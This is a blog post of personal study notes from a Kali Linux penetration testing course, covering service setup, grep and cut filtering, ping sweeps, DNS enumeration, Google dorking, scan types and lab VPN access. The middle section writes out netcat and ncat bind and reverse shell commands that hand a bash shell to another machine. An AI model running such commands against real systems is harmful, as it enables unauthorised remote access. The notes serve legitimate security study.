I’m learning Penetration Testing with Kali Linux and taking notes as I followed the video. This is one way for me to review the old stuff I already knew years ago but stop using because of different project assignments.
Use comments below to post your questions or suggestions.
root#Kali:# passwd ; to change the root password. It’s a habit, I want to make sure I’m the only one using this super user.
Starting SSH Service
root#Kali:# service ssh start
Verify the service is running
root#Kali:# netstat -antp |grep sshd ; you will the following output.
To stop the service.
root#Kali:# service ssh stop
Starting HTTP Service
root#Kali:#service apache2 start
To test if the HTTP server is up and running, open internet browser and enter the URL address e.g. http://127.0.0.1
root#Kali:#service apache2 stop
The example above is to update the index.html file with the text “Kali Linux rocks“. Refresh your internet browser to see your changes. Then stop apache service to close your session.
As alternative, you can use the init script to start/stop the service located in /etc/init.d/
For example, using “init” script to start and stop ssh.
Use a command cat to find a certain text in a file. For example, look for “href=” in an index.html file.
and the output shows all “href=reference to the index.html file.
Let us filter this result by using this command.
cat index.html |grep “href=” |cut -d”/” -f3 |grep “cisco.com”more [enter]. The result are much better, simply adding a parameter to the cat command.
We can still make it better. Don’t you think?
The “f3” means field 3, “f1” is field 1.
Here’s an alternative command using “[A-Za-z0-9_,-]” as shown below.
The second command with >cisco.txt is to send the result to a file.
When I tried this using my home computer, the host http://www.cisco.com is showing 126.96.36.199 because they are using akamai service. You might have a different resolving IP address, that’s should be ok. Our goal is to test the command line.
f1 is the FQDN e.g. e144.dscb.akamaiedge.net as shown above.
f2 is the string “has”
f3 is the string “address”
f4 is the IP Address e.g. 188.8.131.52
cut the space delimeter (cut -d” “) to show field 4 (f4)
#host http://www.cisco.com | grep “has address” |cut -d” ” -f4
Now let’s create a bash script.
#nano cisco.sh ; use a text editor nano to create cisco.sh script.
For loop reading cisco.txt, grepping “has address”, cutting the dilimeter space in field 4.
We updated cisco.sh script permission to execute 755, run ./cisco.sh script, showing the output.
You can also produce a similar result by typing directly to the command prompt using bash scripting as shown below.
Here an example of ping-loop.sh scrip
for ip in $(seq 200 210); do
Save this to ping-loop.sh script file. Change the permission to execute by using the following command.
#chmod 755 ping-loop.sh
Then run it.
#./ping-loop.sh ; this will produce the results.
Now let’s using the ping -c 1 counter.
for ip in $(seq 200 210); do
ping -c 1 192.168.2$ip
Now let’s review on how to use Bind Shell and Reverse Shell. You need to have two workstation for this exercise, the 1st PC (Corporate with IP 192.168.10.100) is in your network and the 2nd PC (OutsiderPC with IP 192.168.10.200) from the outside network.
Using Bind Shell, start this command from your OutsiderPC
nc -nvlp 5555 -e /bin/bash ;starting netcat with listening port 5555, of course you can use other port number and allowing the client (CorporatePC) to connect and execute bash shell command prompt.
From the CorporatePC, connect using the following command
nc -nv 192.168.10.200 5555 [Enter] the IP address is assigned to the OutsiderPC.
When you type “ifconfig” you will see the IP address of OutsiderPC. You are executing this command from the OutsiderPC.
Now Reserve Shell. The difference is the client (CorporatePC) will provide the executable file. Let’s begin by preparing our OutsiderPC. In OutsiderPC, type the following command.
nc -nvlp 5555
From the InsiderPC, connect using the following command.
nc -nv 192.168.10.200 5555 -e /bin/bash [Enter] the IP address is assigned to the OutsiderPC.
Using the OutsiderPC, type “ifconfig” you will see the InsiderPC ip address because you are using the InsiderPC to execute the command.
Please note, using netcat is not encrypted. All transactions are in plain text. The NCAT tool will provide the encryption not available in netcat command. It’s a similar process when you use bind shell or reverse shell.
Bind Shell. From the OutsiderPC, type the following command.
ncat -lvp 443 -e /bin/bash –allow 192.168.x.x –ssl ; ncat will listen to port 443, execute bash shell with ssl (encrypted session). You are allowing specific IP address to connect e.g. 192.168.x.x.
From the CorporatePC, type the following command.
ncat -nv 192.168.10.200 443 –ssl ; now you’re remotely connected to OutsiderPC with encrypted session.
And for the reserve shell, same concept.
From OutsiderPC, enter the following command.
ncat -lvp 443 –ssl
From the CorporatePC, connect using the following command.
ncat -v 192.168.10.200 443 -e /bin/bash –ssl ; now Outsider PC is remotely connected to InsiderPC with encrypted session.
You can use Wireshark to check encrypted session between the two workstations. Try this to your test environment to see how it’s work.
Another example. From Outside PC run the command.
#ncat -lvp 4444 -e /bin/bash –allow 192.168.2.100 –ssl
Run ncat (encrypted) with -lvp using port 444, execute the bash shell, and only allow 192.168.2.100 workstation to using via SSL protocol.
From Inside PC. #ncat -v 192.168.2.200 4444 –ssl
You will see a NCAT SHA-1 fingertprint, Certification verification and SSL connection to the target workstation.
Passive Gathering or passive information gathering is to find all information about your target. Google Search is an excellent tool. Here is an example, type this in google search page.
site:”Microsoft.com” filetype:ppt “penetration testing” we are using Microsoft.com domain with filetype operator to look for a powerpoint file using PPT extension for a specific phrase “penetration testing”. Run this to your browser and review the results.
Another example using intitle operator, enter this to your google search page intitle:”VNC viewer for Java”
And if you’re interested to learn other google search operators, visit this website http://www.googleguide.com/advanced_operators_reference.html.
Use Google Hacking Database (GHDB) now known as The Exploit Database at exploit-db.com site.
How about Active Gathering? Now using one your penetration testing tools such as port scan, dns scanning, enumeration, vulnerability scanning, etc. Please note, test only in your working environment.
Let’s test hardworking.com DNS enumeration, type the following command changing the domain name using your own website so you will see the results you expect.
host -t ns hardworkingc.com [Enter] ;where -t option is used to select the query type. In our example, the query type is ns for name server testing for hardworking.com domain name. You suppose to see two name servers such as nash.ns.cloudflare.com and arya.ns.cloudflare.com.
host -t mx hardworkingc.com [Enter] ; if you guess mail exchange information, you are correct. We are using Google for Work email hosting.
If you don’t have access to a linux box to run these command line, you can use a free online tools such as NetworkQuery.com, DNSStuff.com, etc.
To extend DNS enumeration, you can use the forward and reverse DNS to get more information.
Connect Scan or TCP connect relies on three way handshake.
Syn Scanning or Half-connect or Stealth Scan sending syn packet without completing the TCP handshake.
UDP Scan stateless and does not involve three way handshake.
NMAP is a swiss tool for every admin or network administrator out there. If you don’t have it, go download this tool and add to your arsenal of networking tools.
Before I go on, let me setup my lab workstation and connection.
Visit VMware.com website to download the Workstation Player, here’s the link https://www.vmware.com/products/player/. Download the right program for your lab workstation. I’m using Windows 10, so I will download the 64-bit version. Install it by default, then open the Kali Linux PWK VM image provided to you.
Once your Kali Linux PWK VM image is up and running, don’t forget to change your root password to something new. Keep in mind, you will be connect to a lab environment where other ethical hacker will be curious to find out (hack) your test workstation.
Setting up OpenVPN. Download the lab connection configuration, the link should be provided to your email. Initiate the download from a running Kali Linux PWK VM image, you should be able to see it at /root/Download/.
Extract by running this command “tar jxpf lab-connection.tar.bz2” [Enter]
Start OpenVPN session. root@kali:~/Downloads/lab-connection/ openvpn lab-connection.conf [Enter]. This will prompt to enter your username and password. If connected properly, you should see Initialization Sequence Completed.
If you can’t connect from your work network maybe a Firewall is blocking your openvpn connection. Make sure you open up TCP 443, TCP 943 and UDP 1194. I’ve tested it. Once connected, leave it. Open another terminal console to check your new IP address assigned to you when you are connected via OpenVPN. Type the command ifconfig tap0 (or only ifconfig will also work). To test your OpenVPN connection, ping one of the lab server IP.
Dedicated Windows 7 Virtual Machine. Go to your Student Control Panel to power on your Windows 7. After that, in terminal console run rdesktop -u xxxx -p yyyy 192.168.xx.xx to connect to your Windows 7 Virtual Machine.
Enjoy your lab.
We moved to KING.NET so future update of this article will be up there.
This article was first posted at https://que.com website. February 13, 2016.